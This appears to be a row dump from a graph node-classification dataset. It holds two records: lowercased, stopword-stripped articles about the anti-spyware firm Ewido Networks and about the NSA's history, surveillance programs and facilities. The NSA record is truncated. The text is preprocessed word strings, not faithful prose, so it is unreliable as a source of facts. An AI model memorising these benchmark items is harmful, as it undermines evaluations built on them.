node_id
int64
0
76.9k
label
int64
0
39
text
stringlengths
13
124k
neighbors
listlengths
0
3.32k
mask
stringclasses
4 values
7,886
4
Ewido_Networks:ewido networks ewido networks software company based germany known creating ewido anti-spyware ewido anti-spyware software used remove malware spyware trojan horses adware dialers worms also featured real-time protection automatic updates privacy features ewido free version paid version added realtime protection automatic updates ewido networks founded germany 2004 andreas rudyk peter klapprodt tobias graf first product ewido security suite ewido given digital river ice award best newcomer year april 19 2006 announced czech grisoft acquired german anti-malware company ewido networks birth grisoft avg anti spyware anti spyware based ewido engine grisoft includes ewido many security suites bundles antivirus products software began life ewido security suite name changed ewido anti-malware december 2005 release 4.0 later changed ewido anti-spyware ewido anti-spyware included new features scheduled scans file shredder running process manager new interface also included lsp bho viewer free version realtime protection automatic updates users could update manually last known price 29.99 grisoft acquisition however ewido anti-spyware development stopped continues exist ewido online scanner ewido micro scanner using full ewido engine signatures without excluding heuristic detection options avg 8.0 avg anti-spyware integrated avg anti-virus longer available standalone product means avg anti-spyware longer receive updates ewido works many popular antivirus spyware products
[ 704, 2049, 7362, 10756, 4677, 550, 877, 4403, 6643, 2005, 10392, 2041, 1242, 7515, 9055 ]
None
7,887
4
National_Security_Agency:national security agency national security agency nsa national-level intelligence agency united states department defense authority director national intelligence nsa responsible global monitoring collection processing information data foreign domestic intelligence counterintelligence purposes specializing discipline known signals intelligence sigint nsa also tasked protection u.s. communications networks information systems nsa relies variety measures accomplish mission majority clandestine originating unit decipher coded communications world war ii officially formed nsa president harry s. truman 1952 since become largest u.s. intelligence organizations terms personnel budget nsa currently conducts worldwide mass data collection known physically bug electronic systems one method end nsa also alleged behind attack software stuxnet severely damaged iran nuclear program nsa alongside central intelligence agency cia maintains physical presence many countries across globe cia/nsa joint special collection service highly classified intelligence team inserts eavesdropping devices high value targets presidential palaces embassies scs collection tactics allegedly encompass close surveillance burglary wiretapping breaking entering unlike cia defense intelligence agency dia specialize primarily foreign human espionage nsa publicly conduct human-source intelligence gathering nsa entrusted providing assistance coordination sigint elements government organizations – prevented law engaging activities part responsibilities agency co-located organization called central security service css facilitates cooperation nsa u.s. defense cryptanalysis components ensure streamlined communication signals intelligence community divisions nsa director simultaneously serves commander united states cyber command chief central security service nsa actions matter political controversy several occasions including spying anti-vietnam-war leaders agency participation economic espionage 2013 nsa many secret surveillance programs revealed public edward snowden former nsa contractor according leaked documents nsa intercepts stores communications billion people worldwide including united states citizens documents also revealed nsa tracks hundreds millions people movements using cellphones metadata internationally research pointed nsa ability surveil domestic internet traffic foreign countries boomerang routing origins national security agency traced back april 28 1917 three weeks u.s. congress declared war germany world war code cipher decryption unit established cable telegraph section also known cipher bureau headquartered washington d.c. part war effort executive branch without direct congressional authorization course war relocated army organizational chart several times july 5 1917 herbert o. yardley assigned head unit point unit consisted yardley two civilian clerks absorbed navy cryptanalysis functions july 1918 world war ended november 11 1918 army cryptographic section military intelligence mi-8 moved new york city may 20 1919 continued intelligence activities code compilation company direction yardley disbandment u.s. army cryptographic section military intelligence known mi-8 1919 u.s. government created cipher bureau also known black chamber black chamber united states first peacetime cryptanalytic organization jointly funded army state department cipher bureau disguised new york city commercial code company actually produced sold codes business use true mission however break communications chiefly diplomatic nations notable known success washington naval conference aided american negotiators considerably providing decrypted traffic many conference delegations notably japanese black chamber successfully persuaded western union largest u.s. telegram company time well several communications companies illegally give black chamber access cable traffic foreign embassies consulates soon companies publicly discontinued collaboration despite chamber initial successes shut 1929 u.s. secretary state henry l. stimson defended decision stating gentlemen read mail world war ii signal intelligence service sis created intercept decipher communications axis powers war ended sis reorganized army security agency asa placed leadership director military intelligence may 20 1949 cryptologic activities centralized national organization called armed forces security agency afsa organization originally established within u.s. department defense command joint chiefs staff afsa tasked direct department defense communications electronic intelligence activities except u.s. military intelligence units however afsa unable centralize communications intelligence failed coordinate civilian agencies shared interests department state central intelligence agency cia federal bureau investigation fbi december 1951 president harry s. truman ordered panel investigate afsa failed achieve goals results investigation led improvements redesignation national security agency agency formally established truman memorandum october 24 1952 revised national security council intelligence directive nscid 9 since president truman memo classified document existence nsa known public time due ultra-secrecy u.s. intelligence community referred nsa agency 1960s nsa played key role expanding u.s. commitment vietnam war providing evidence north vietnamese attack american destroyer gulf tonkin incident secret operation code-named minaret set nsa monitor phone communications senators frank church howard baker well major civil rights leaders including martin luther king jr. prominent u.s. journalists athletes criticized vietnam war however project turned controversial internal review nsa concluded minaret program disreputable outright illegal nsa mounted major effort secure tactical communications among u.s. forces war mixed success nestor family compatible secure voice systems developed widely deployed vietnam war 30,000 nestor sets produced however variety technical operational problems limited use allowing north vietnamese exploit intercept u.s. communications aftermath watergate scandal congressional hearing 1975 led senator frank church revealed nsa collaboration britain sigint intelligence agency government communications headquarters gchq routinely intercepted international communications prominent anti-vietnam war leaders jane fonda dr. benjamin spock agency tracked individuals secret filing system destroyed 1974 following resignation president richard nixon several investigations suspected misuse fbi cia nsa facilities senator frank church uncovered previously unknown activity cia plot ordered administration president john f. kennedy assassinate fidel castro investigation also uncovered nsa wiretaps targeted u.s. citizens church committee hearings foreign intelligence surveillance act 1978 passed law designed limit practice mass surveillance united states 1986 nsa intercepted communications libyan government immediate aftermath berlin discotheque bombing white house asserted nsa interception provided irrefutable evidence libya behind bombing u.s. president ronald reagan cited justification 1986 united states bombing libya 1999 multi-year investigation european parliament highlighted nsa role economic espionage report entitled 'development surveillance technology risk abuse economic information year nsa founded nsa hall honor memorial national cryptologic museum fort meade maryland memorial tribute pioneers heroes made significant long-lasting contributions american cryptology nsa employees must retired fifteen years qualify memorial nsa infrastructure deteriorated 1990s defense budget cuts resulted maintenance deferrals january 24 2000 nsa headquarters suffered total network outage three days caused overloaded network incoming traffic successfully stored agency servers could directed processed agency carried emergency repairs cost 3 million get system running incoming traffic also directed instead britain gchq time director michael hayden called outage wake-up call need invest agency infrastructure 1990s defensive arm nsa – information assurance directorate iad – started working openly first public technical talk nsa scientist major cryptography conference j. solinas presentation efficient elliptic curve cryptography algorithms crypto 1997 iad cooperative approach academia industry culminated support transparent process replacing outdated data encryption standard des advanced encryption standard aes cybersecurity policy expert susan landau attributes nsa harmonious collaboration industry academia selection aes 2000 — agency support choice strong encryption algorithm designed europeans rather americans — brian snow technical director iad represented nsa cochairman technical working group aes competition michael jacobs headed iad time terrorist attacks september 11 2001 nsa believed public support dramatic expansion surveillance activities according neal koblitz alfred menezes period nsa trusted partner academia industry development cryptographic standards started come end part change nsa post-september 11 era snow replaced technical director jacobs retired iad could longer effectively oppose proposed actions offensive arm nsa aftermath september 11 attacks nsa created new systems deal flood information new technologies like internet cellphones thinthread contained advanced data mining capabilities also privacy mechanism surveillance stored encrypted decryption required warrant research done program may contributed technology used later systems thinthread cancelled michael hayden chose trailblazer include thinthread privacy system trailblazer project ramped 2002 worked science applications international corporation saic boeing computer sciences corporation ibm litton industries nsa whistleblowers complained internally major problems surrounding trailblazer led investigations congress nsa dod inspectors general project cancelled early 2004 turbulence started 2005 developed small inexpensive test pieces rather one grand plan like trailblazer also included offensive cyber-warfare capabilities like injecting malware remote computers congress criticized turbulence 2007 similar bureaucratic problems trailblazer realization information processing higher speeds cyberspace massive extent nsa spying foreign domestic revealed public series detailed disclosures internal nsa documents beginning june 2013 disclosures leaked former nsa contractor edward snowden nsa eavesdropping mission includes radio broadcasting various organizations individuals internet telephone calls intercepted forms communication secure communications mission includes military diplomatic sensitive confidential secret government communications according 2010 article washington post e day collection systems national security agency intercept store 1.7 billion e-mails phone calls types communications nsa sorts fraction 70 separate databases listening task nsa/css heavily involved cryptanalytic research continuing work predecessor agencies broken many world war ii codes ciphers see instance purple venona project jn-25 2004 nsa central security service national cyber security division department homeland security dhs agreed expand nsa centers academic excellence information assurance education program part national security presidential directive 54/homeland security presidential directive 23 nspd 54 signed january 8 2008 president bush nsa became lead agency monitor protect federal government computer networks cyber-terrorism operations national security agency divided three types echelon created incubator cold war today legacy system several nsa stations closing nsa/css combination equivalent agencies united kingdom government communications headquarters canada communications security establishment australia defence signals directorate new zealand government communications security bureau otherwise known ukusa group reported command operation so-called echelon system capabilities suspected include ability monitor large proportion world transmitted civilian telephone fax data traffic early 1970s first became eight large satellite communications dishes installed menwith hill investigative journalist duncan campbell reported 1988 echelon surveillance program extension ukusa agreement global signals intelligence sigint detailed eavesdropping operations worked november 3 1999 bbc reported confirmation australian government existence powerful global spying network code-named echelon could eavesdrop every single phone call fax e-mail anywhere planet britain united states chief protagonists confirmed menwith hill linked directly headquarters us national security agency nsa fort meade maryland nsa united states signals intelligence directive 18 ussid 18 strictly prohibited interception collection information ... u.s. persons entities corporations organizations ... without explicit written legal permission united states attorney general subject located abroad foreign intelligence surveillance court within u.s. borders alleged echelon-related activities including use motives national security including political industrial espionage received criticism countries outside ukusa alliance nsa also involved planning blackmail people sexint intelligence gained potential target sexual activity preferences targeted committed apparent crime charged one order support facial recognition program nsa intercepting millions images per day real time regional gateway data collection program introduced 2005 iraq nsa iraq war consisted gathering electronic communication storing searching otherwise analyzing effective providing information iraqi insurgents eluded less comprehensive techniques collect strategy introduced nsa director keith b. alexander believed glenn greenwald guardian model comprehensive worldwide mass archiving communications nsa engaged 2013 dedicated unit nsa locates targets cia extrajudicial assassination middle east nsa also spied extensively european union united nations numerous governments including allies trading partners europe south america asia june 2015 wikileaks published documents showing nsa spied french companies july 2015 wikileaks published documents showing nsa spied federal german ministries since 1990s even germany chancellor angela merkel cellphones phone predecessors intercepted edward snowden revealed june 2013 february 8 march 8 2013 nsa collected 124.8 billion telephone data items 97.1 billion computer data items throughout world displayed charts internal nsa tool codenamed boundless informant initially reported data reflected eavesdropping citizens countries like germany spain france later became clear data collected european agencies military missions abroad subsequently shared nsa 2013 reporters uncovered secret memo claims nsa created pushed adoption dual ec drbg encryption standard contained built-in vulnerabilities 2006 united states national institute standards technology nist international organization standardization aka iso memo appears give credence previous speculation cryptographers microsoft research edward snowden claims nsa often bypasses encryption altogether lifting information encrypted decrypted xkeyscore rules specified file xkeyscorerules100.txt sourced german tv stations ndr wdr claim excerpts source code reveal nsa tracks users privacy-enhancing software tools including tor anonymous email service provided mit computer science artificial intelligence laboratory csail cambridge massachusetts readers linux journal linus torvalds founder linux kernel joked linuxcon keynote september 18 2013 nsa founder selinux wanted backdoor kernel however later linus father member european parliament mep revealed nsa actually ibm notes first widely adopted software product use public key cryptography client–server server–server authentication encryption data us laws regulating encryption changed 2000 ibm lotus prohibited exporting versions notes supported symmetric encryption keys longer 40 bits 1997 lotus negotiated agreement nsa allowed export version supported stronger keys 64 bits 24 bits encrypted special key included message provide workload reduction factor nsa strengthened protection users notes outside us private-sector industrial espionage spying us government assumed foreign transmissions terminating u.s. non-u.s. citizen accessing u.s. website subject non-u.s. citizens nsa surveillance recent research boomerang routing raised new concerns nsa ability surveil domestic internet traffic foreign countries boomerang routing occurs internet transmission originates terminates single country transits another research university toronto suggested approximately 25 canadian domestic traffic may subject nsa surveillance activities result boomerang routing canadian internet service providers document included nsa files released glenn greenwald book place hide details agency tailored access operations tao nsa units gain access hardware intercept routers servers network hardware shipped organizations targeted surveillance install covert implant firmware onto delivered described nsa manager productive operations tao preposition access points hard target networks around world computers seized nsa due interdiction often modified physical device known cottonmouth cottonmouth device inserted usb port computer order establish remote access targeted machine according nsa tailored access operations tao group implant catalog implanting cottonmouth nsa establish network bridge allows nsa load exploit software onto modified computers well allowing nsa relay commands data hardware software implants nsa mission set forth executive order 12333 1981 collect information constitutes foreign intelligence counterintelligence acquiring information concerning domestic activities united states persons nsa declared relies fbi collect information foreign intelligence activities within borders united states confining activities within united states embassies missions foreign nations appearance 'domestic surveillance directorate nsa soon exposed hoax 2013 nsa domestic surveillance activities limited requirements imposed fourth amendment u.s. constitution foreign intelligence surveillance court example held october 2011 citing multiple supreme court precedents fourth amendment prohibitions unreasonable searches seizures applies contents communications whatever means person private communications akin personal papers however protections apply non-u.s. persons located outside u.s. borders nsa foreign surveillance efforts subject far fewer limitations u.s. law specific requirements domestic surveillance operations contained foreign intelligence surveillance act 1978 fisa extend protection non-u.s. citizens located outside u.s. territory george w. bush president 9/11 terrorist attacks approved patriot act shortly attacks take anti-terrorist security measures title 1 2 9 specifically authorized measures would taken nsa titles granted enhanced domestic security terrorism surveillance procedures improved intelligence respectively march 10 2004 debate president bush white house counsel alberto gonzales attorney general john ashcroft acting attorney general james comey attorneys general unsure nsa programs could considered constitutional threatened resign matter ultimately nsa programs continued march 11 2004 president bush signed new authorization mass surveillance internet records addition surveillance phone records allowed president able override laws foreign intelligence surveillance act protected civilians mass surveillance addition president bush also signed measures mass surveillance also retroactively place prism program started 2007 nsa gathers internet communications foreign targets nine major u.s. internet-based communication service providers microsoft yahoo google facebook paltalk aol skype youtube apple data gathered include email video voice chat videos photos voip chats skype file transfers former nsa director general keith alexander claimed september 2009 nsa prevented najibullah zazi friends carrying terrorist attack however claim debunked evidence presented demonstrating nsa ever instrumental preventing terrorist attack besides traditional ways eavesdropping order collect signals intelligence nsa also engaged hacking computers smartphones networks operations conducted tailored access operations tao division active since least circa 1998 according foreign policy magazine ... office tailored access operations tao successfully penetrated chinese computer telecommunications systems almost 15 years generating best reliable intelligence information going inside people republic china interview wired magazine edward snowden said tailored access operations division accidentally caused syria internet blackout 2012 nsa led director national security agency dirnsa also serves chief central security service chcss commander united states cyber command uscybercom highest-ranking military official organizations assisted deputy director highest-ranking civilian within nsa/css nsa also inspector general head office inspector general oig general counsel head office general counsel ogc director compliance head office director compliance odoc unlike intelligence organizations cia dia nsa always particularly reticent concerning internal organizational structure mid-1990s national security agency organized five directorates directorates consisted several groups elements designated letter example group responsible sigint operations soviet union eastern europe g group responsible sigint related non-communist countries groups divided units designated additional number like unit a5 breaking soviet codes g6 office middle east north africa cuba central south america nsa dozen directorates designated letter although publicly known directorates divided divisions units starting letter parent directorate followed number division sub-unit sub-sub-unit main elements organizational structure nsa year 2000 leadership team formed consisting director deputy director directors signals intelligence sid information assurance iad technical directorate td chiefs main nsa divisions became associate directors senior leadership team president george w. bush initiated president surveillance program psp 2001 nsa created 24-hour metadata analysis center mac followed 2004 advanced analysis division aad mission analyzing content internet metadata telephone metadata units part signals intelligence directorate 2016 proposal would combine signals intelligence directorate information assurance directorate directorate operations nsanet stands national security agency network official nsa intranet classified network information level ts/sci support use sharing intelligence data nsa signals intelligence agencies four nations five eyes partnership management nsanet delegated central security service texas csstexas nsanet highly secured computer network consisting fiber-optic satellite communication channels almost completely separated public internet network allows nsa personnel civilian military intelligence analysts anywhere world access agency systems databases access tightly controlled monitored example every keystroke logged activities audited random downloading printing documents nsanet recorded 1998 nsanet along niprnet siprnet significant problems poor search capabilities unorganized data old information 2004 network reported used twenty commercial off-the-shelf operating systems universities highly sensitive research allowed connect thousands top secret internal nsa documents taken edward snowden 2013 stored file-sharing location nsa intranet site could easily read online nsa personnel everyone ts/sci-clearance access documents system administrator snowden responsible moving accidentally misplaced highly sensitive documents safer storage locations nsa maintains least two watch centers number nsa employees officially classified several sources providing estimates 1961 nsa 59,000 military civilian employees grew 93,067 1969 19,300 worked headquarters fort meade early 1980s nsa roughly 50,000 military civilian personnel 1989 number grown 75,000 25,000 worked nsa headquarters 1990 1995 nsa budget workforce cut one third led substantial loss experience 2012 nsa said 30,000 employees worked fort meade facilities 2012 john c. inglis deputy director said total number nsa employees somewhere 37,000 one billion joke stated agency probably biggest employer introverts 2013 der spiegel stated nsa 40,000 employees widely described world largest single employer mathematicians nsa employees form part workforce national reconnaissance office nro agency provides nsa satellite signals intelligence 2013 1,000 system administrators work nsa nsa received criticism early 1960 two agents defected soviet union investigations house un-american activities committee special subcommittee united states house committee armed services revealed severe cases ignorance personnel security regulations prompting former personnel director director security step leading adoption stricter security practices nonetheless security breaches reoccurred year later issue izvestia july 23 1963 former nsa employee published several cryptologic secrets day nsa clerk-messenger committed suicide ongoing investigations disclosed sold secret information soviets regular basis reluctance congressional houses look affairs prompted journalist write similar series tragic blunders occurred ordinary agency government aroused public would insist responsible officially censured demoted fired david kahn criticized nsa tactics concealing doings smug congress blind faith agency right-doing shortsighted pointed necessity surveillance congress prevent abuse power edward snowden leaking existence prism 2013 caused nsa institute two-man rule two system administrators required present one accesses certain sensitive information snowden claims suggested rule 2009 nsa conducts polygraph tests employees new employees tests meant discover enemy spies applying nsa uncover information could make applicant pliant coercion part latter historically epqs embarrassing personal questions sexual behavior included nsa polygraph nsa also conducts five-year periodic reinvestigation polygraphs employees focusing counterintelligence programs addition nsa conducts periodic polygraph investigations order find spies leakers refuse take may receive termination employment according 1982 memorandum director nsa also special access examination polygraphs employees wish work highly sensitive areas polygraphs cover counterintelligence questions questions behavior nsa brochure states average test length two four hours 1983 report office technology assessment stated appears nsa national security agency possibly cia use polygraph determine deception truthfulness per se technique interrogation encourage admissions sometimes applicants polygraph process confess committing felonies murder rape selling illegal drugs 1974 1979 20,511 job applicants took polygraph tests 695 3.4 confessed previous felony crimes almost crimes undetected 2010 nsa produced video explaining polygraph process video ten minutes long titled truth polygraph posted web site defense security service jeff stein washington post said video portrays various applicants actors playing — clear — describing everything bad heard test implication none true antipolygraph.org argues nsa-produced video omits information polygraph process produced video responding nsa video george maschke founder web site accused nsa polygraph video orwellian edward snowden revealed identity 2013 nsa began requiring polygraphing employees per quarter number exemptions legal requirements criticized 1964 congress hearing bill giving director nsa power fire employee washington post wrote definition arbitrariness means employee could discharged disgraced basis anonymous allegations without slightest opportunity defend yet bill accepted overwhelming majority also every person hired job us 2007 private organization state federal government agency must reported new hire registry ostensibly look child support evaders except employees intelligence agency may excluded reporting director deems necessary national security reasons agency first established headquarters cryptographic center naval security station washington d.c comint functions located arlington hall northern virginia served headquarters u.s. army cryptographic operations soviet union detonated nuclear bomb facilities crowded federal government wanted move several agencies including afsa/nsa planning committee considered fort knox fort meade maryland ultimately chosen nsa headquarters far enough away washington d.c. case nuclear strike close enough employees would move families construction additional buildings began agency occupied buildings fort meade late 1950s soon outgrew 1963 new headquarters building nine stories tall opened nsa workers referred building headquarters building since nsa management occupied top floor workers used ninth floor refer leaders comsec remained washington d.c. new building completed 1968 september 1986 operations 2a 2b buildings copper-shielded prevent eavesdropping opened dedication president ronald reagan four nsa buildings became known big four nsa director moved 2b opened headquarters national security agency located fort george g. meade maryland although separate compounds agencies based within military installation fort meade southwest baltimore northeast washington d.c nsa two dedicated exits baltimore–washington parkway eastbound exit parkway heading toward baltimore open public provides employee access main campus public access national cryptology museum westbound side exit heading toward washington labeled nsa employees exit may used people proper clearances security vehicles parked along road guard entrance nsa largest employer state maryland two-thirds personnel work fort meade built fort meade site 1,300 buildings estimated 18,000 parking spaces main nsa headquarters operations building james bamford author body secrets describes modern boxy structure appears similar stylish office building building covered one-way dark glass lined copper shielding order prevent espionage trapping signals sounds contains floor space bamford said u.s. capitol could easily fit inside four times facility 100 watchposts one visitor control center two-story area serves entrance entrance white pentagonal structure visitor badges issued visitors security clearances employees checked visitor center includes painting nsa seal ops2a building tallest building nsa complex location much agency operations directorate accessible visitor center bamford described dark glass rubik cube facility red corridor houses non-security operations concessions drug store name refers red badge worn someone without security clearance nsa headquarters includes cafeteria credit union ticket counters airlines entertainment barbershop bank nsa headquarters post office fire department police force employees nsa headquarters reside various places baltimore-washington area including annapolis baltimore columbia maryland district columbia including georgetown community nsa maintains shuttle service odenton station marc visitor control center done since 2005 following major power outage 2000 2003 follow-ups 2007 baltimore sun reported nsa risk electrical overload insufficient internal electrical infrastructure fort meade support amount equipment installed problem apparently recognized 1990s made priority agency ability keep operations going threatened august 6 2006 baltimore sun reported nsa completely maxed grid baltimore gas electric bge constellation energy unable sell power bge provided nsa 65 75 megawatts fort meade 2007 expected increase 10 15 megawatts would needed later year 2011 nsa maryland largest consumer power 2007 bge largest customer nsa bought much electricity annapolis capital city maryland one estimate put potential power consumption new utah data center 40 million per year 1995 baltimore sun reported nsa owner single largest group supercomputers nsa held groundbreaking ceremony fort meade may 2013 high performance computing center 2 expected open 2016 called site center 150 megawatt power substation 14 administrative buildings 10 parking garages cost 3.2 billion covers center initially uses 60 megawatts electricity increments ii iii expected completed 2030 would quadruple space covering 60 buildings 40 parking garages defense contractors also establishing expanding cybersecurity facilities near nsa around washington metropolitan area dod computer security center founded 1981 renamed national computer security center ncsc 1985 ncsc responsible computer security throughout federal government ncsc part nsa late 1980s 1990s nsa ncsc published trusted computer system evaluation criteria six-foot high rainbow series books detailed trusted computing network platform specifications rainbow books replaced common criteria however early 2000s 2012 nsa collected intelligence four geostationary satellites satellite receivers roaring creek station catawissa pennsylvania salt creek station arbuckle california operated ten twenty taps u.s. telecom switches nsa installations several u.s. states observed intercepts europe middle east north africa latin america asia nsa facilities friendship annex fanx linthicum maryland 20 25-minute drive fort meade aerospace data facility buckley air force base aurora outside denver colorado nsa texas texas cryptology center lackland air force base san antonio texas nsa georgia fort gordon augusta georgia nsa hawaii honolulu multiprogram research facility oak ridge tennessee elsewhere january 6 2011 groundbreaking ceremony held begin construction nsa first comprehensive national cyber-security initiative cnci data center known utah data center short 1.5b data center built camp williams utah located south salt lake city help support agency national cyber-security initiative expected operational september 2013 2009 protect assets access electricity nsa sought decentralize expand existing facilities fort meade menwith hill latter expansion expected completed 2015 yakima herald-republic cited bamford saying many nsa bases echelon program legacy system using outdated 1990s technology 2004 nsa closed operations bad aibling station field station 81 bad aibling germany 2012 nsa began move operations yakima research station yakima training center washington state colorado planning leave yakima closed 2013 nsa also intended close operations sugar grove west virginia following signing 1946–1956 ukusa agreement united states united kingdom canada australia new zealand cooperated signals intelligence echelon nsa stations built gchq bude morwenstow united kingdom geraldton pine gap shoal bay australia leitrim ottawa ontario canada misawa japan waihopai tangimoana new zealand nsa operates raf menwith hill north yorkshire united kingdom according bbc news 2007 largest electronic monitoring station world planned 1954 opened 1960 base covered 1999 agency european cryptologic center ecc 240 employees 2011 headquartered us military compound griesheim near frankfurt germany 2011 nsa report indicates ecc responsible largest analysis productivity europe focuses various priorities including africa europe middle east counterterrorism operations 2013 new consolidated intelligence center also used nsa built headquarters united states army europe wiesbaden germany nsa partnership bundesnachrichtendienst bnd german foreign intelligence service confirmed bnd president gerhard schindler thailand 3rd party partner nsa along nine nations non-english-speaking countries made security agreements exchange sigint raw material end product reports thailand site least two us sigint collection stations one us embassy bangkok joint nsa-cia special collection service scs unit presumably eavesdrops foreign embassies governmental communications targets opportunity second installation fornsat foreign satellite interception station thai city khon kaen codenamed indra also referred lemonwood station approximately 40 ha 100 acres size consists large 3,700–4,600 40,000–50,000 ft operations building west side ops compound four radome-enclosed parabolic antennas possibly two radome-enclosed antennas used satcom intercept two antennas used relaying intercepted material back nsa also pusher-type circularly-disposed antenna array cdaa array north ops compound nsa activated khon kaen october 1979 mission eavesdrop radio traffic chinese army air force units southern china especially around city kunming yunnan province back late 1970s base consisted small cdaa antenna array remote-controlled via satellite nsa listening post kunia hawaii small force civilian contractors bendix field engineering corp. whose job keep antenna array satellite relay facilities running 24/7 according papers late general william odom indra facility upgraded 1986 new british-made pusher cdaa antenna part overall upgrade nsa thai sigint facilities whose objective spy neighboring communist nations vietnam laos cambodia base apparently fell disrepair 1990s china vietnam became friendly towards us 2002 archived satellite imagery showed pusher cdaa antenna torn perhaps indicating base closed point period since 9/11 khon kaen base reactivated expanded include sizeable satcom intercept mission likely nsa presence khon kaen relatively small work done civilian contractors nsa involved debates public policy indirectly behind-the-scenes adviser departments directly vice admiral bobby ray inman directorship nsa major player debates 1990s regarding export cryptography united states restrictions export reduced eliminated 1996 secure government communications work involved nsa numerous technology areas including design specialized communications hardware software production dedicated semiconductors ft. meade chip fabrication plant advanced cryptography research 50 years nsa designed built computer equipment in-house 1990s 2003 u.s. congress curtailed practice agency contracted private sector fields research equipment nsa embroiled minor controversy concerning involvement creation data encryption standard des standard public block cipher algorithm used u.s. government banking community development des ibm 1970s nsa recommended changes details design suspicion changes weakened algorithm sufficiently enable agency eavesdrop required including speculation critical component—the so-called s-boxes—had altered insert backdoor reduction key length might made feasible nsa discover des keys using massive computing power since observed s-boxes des particularly resilient differential cryptanalysis technique publicly discovered late 1980s known ibm des team involvement nsa selecting successor data encryption standard des advanced encryption standard aes limited hardware performance testing see aes competition nsa subsequently certified aes protection classified information used nsa-approved systems nsa responsible encryption-related components legacy systems nsa oversees encryption following systems use today nsa specified suite suite b cryptographic algorithm suites used u.s. government systems suite b algorithms subset previously specified nist expected serve information protection purposes suite algorithms secret intended especially high levels protection widely used sha-1 sha-2 hash functions designed nsa sha-1 slight modification weaker sha-0 algorithm also designed nsa 1993 small modification suggested nsa two years later justification fact provides additional security attack sha-0 apply revised algorithm indeed found 1998 2005 academic cryptographers weaknesses key length restrictions sha-1 nist deprecates use digital signatures approves newer sha-2 algorithms applications 2013 new hash standard sha-3 recently selected competition concluded october 2 2012 selection keccak algorithm process select sha-3 similar one held choosing aes doubts cast since fundamental modifications made keccak order turn standard changes potentially undermine cryptanalysis performed competition reduce security levels algorithm nsa promoted inclusion random number generator called dual ec drbg u.s. national institute standards technology 2007 guidelines led speculation backdoor would allow nsa access data encrypted systems using pseudo random number generator deemed plausible based fact output next iterations prng provably determined relation two internal elliptic curve points known nist rsa officially recommending use prng concerns widespread use strong cryptography would hamper government use wiretaps nsa proposed concept key escrow 1993 introduced clipper chip would offer stronger protection des would allow access encrypted data authorized law enforcement officials proposal strongly opposed key escrow requirements ultimately went nowhere however nsa fortezza hardware-based encryption cards created clipper project still used within government nsa ultimately declassified published design skipjack cipher used cards perfect citizen program perform vulnerability assessment nsa u.s. critical infrastructure originally reported program develop system sensors detect cyber attacks critical infrastructure computer networks private public sector network monitoring system named einstein funded comprehensive national cybersecurity initiative thus far raytheon received contract 100 million initial stage nsa invested many millions dollars academic research grant code prefix mda904 resulting 3,000 papers nsa/css times attempted restrict publication academic research cryptography example khufu khafre block ciphers voluntarily withheld response nsa request response foia lawsuit 2013 nsa released 643-page research paper titled untangling web guide internet research written compiled nsa employees assist nsa workers searching information interest agency public internet nsa ability file patent u.s. patent trademark office gag order unlike normal patents revealed public expire however patent office receives application identical patent third party reveal nsa patent officially grant nsa full term date one nsa published patents describes method geographically locating individual computer site internet-like network based latency multiple network connections although public patent exists nsa reported used similar locating technology called trilateralization allows real-time tracking individual location including altitude ground level using data obtained cellphone towers heraldic insignia nsa consists eagle inside circle grasping key talons eagle represents agency national mission breast features shield bands red white taken great seal united states representing congress key taken emblem saint peter represents security nsa created agency emblem used department defense agency adopted first two emblems 1963 current nsa insignia use since 1965 then-director ltg marshall s. carter usa ordered creation device represent agency nsa flag consists agency seal light blue background crews associated nsa missions involved number dangerous deadly situations uss liberty incident 1967 uss pueblo incident 1968 examples losses endured cold war national security agency/central security service cryptologic memorial honors remembers fallen personnel military civilian intelligence missions made black granite 171 names carved located nsa headquarters tradition declassifying stories fallen begun 2001 united states least since 2001 legal controversy signal intelligence used much freedom national security agency use signal intelligence 2015 government made slight changes uses collects certain types data specifically phone records government analyzing phone records early 2019 december 16 2005 new york times reported white house pressure executive order president george w. bush national security agency attempt thwart terrorism tapping phone calls made persons outside country without obtaining warrants united states foreign intelligence surveillance court secret court created purpose foreign intelligence surveillance act fisa one surveillance program authorized u.s signals intelligence directive 18 president george bush highlander project undertaken national security agency u.s. army 513th military intelligence brigade nsa relayed telephone including cell phone conversations obtained ground airborne satellite monitoring stations various u.s. army signal intelligence officers including 201st military intelligence battalion conversations citizens u.s. intercepted along nations proponents surveillance program claim president executive authority order action arguing laws fisa overridden president constitutional powers addition argued fisa implicitly overridden subsequent statute authorization use military force although supreme court ruling hamdan v. rumsfeld deprecates view august 2006 case aclu v. nsa u.s. district court judge anna diggs taylor concluded nsa warrantless surveillance program illegal unconstitutional july 6 2007 6th circuit court appeals vacated decision grounds aclu lacked standing bring suit january 17 2006 center constitutional rights filed lawsuit ccr v. bush george w. bush presidency lawsuit challenged national security agency nsa surveillance people within u.s. including interception ccr emails without securing warrant first september 2008 electronic frontier foundation eff filed class action lawsuit nsa several high-ranking officials bush administration charging illegal unconstitutional program dragnet communications surveillance based documentation provided former technician mark klein result usa freedom act passed congress june 2015 nsa shut bulk phone surveillance program november 29 year usa freedom act forbids nsa collect metadata content phone calls unless warrant terrorism investigation case agency ask telecom companies record kept six months may 2008 mark klein former employee alleged company cooperated nsa installing narus hardware replace fbi carnivore program monitor network communications including traffic u.s. citizens nsa reported 2008 use computing capability analyze transactional data regularly acquires government agencies gather jurisdictional authorities part effort nsa monitors huge volumes records domestic email data web addresses internet searches bank transfers credit-card transactions travel records telephone data according current former intelligence officials interviewed wall street journal sender recipient subject line emails included content messages phone calls 2013 advisory group obama administration seeking reform nsa spying programs following revelations documents released edward j. snowden mentioned 'recommendation 30 page 37 ... national security council staff manage interagency process review regular basis activities us government regarding attacks exploit previously unknown vulnerability computer application retired cyber security expert richard a. clarke group member stated april 11 nsa advance knowledge heartbleed august 2013 revealed 2005 irs training document showed nsa intelligence intercepts wiretaps foreign domestic supplied drug enforcement administration dea internal revenue service irs illegally used launch criminal investigations us citizens law enforcement agents directed conceal investigations began recreate apparently legal investigative trail re-obtaining evidence means months leading april 2009 nsa intercepted communications u.s. citizens including congressman although justice department believed interception unintentional justice department took action correct issues bring program compliance existing laws united states attorney general eric holder resumed program according understanding foreign intelligence surveillance act amendment 2008 without explaining occurred polls conducted june 2013 found divided results among americans regarding nsa secret data collection rasmussen reports found 59 americans disapprove gallup found 53 disapprove pew found 56 favor nsa data collection april 25 2013 nsa obtained court order requiring verizon business network services provide metadata calls system nsa ongoing daily basis three-month period reported guardian june 6 2013 information includes numbers parties call ... location data call duration unique identifiers time duration calls contents conversation order relies so-called business records provision patriot act august 2013 following snowden leaks new details nsa data mining activity revealed reportedly majority emails united states captured selected communications links automatically analyzed keywords selectors emails match deleted utility 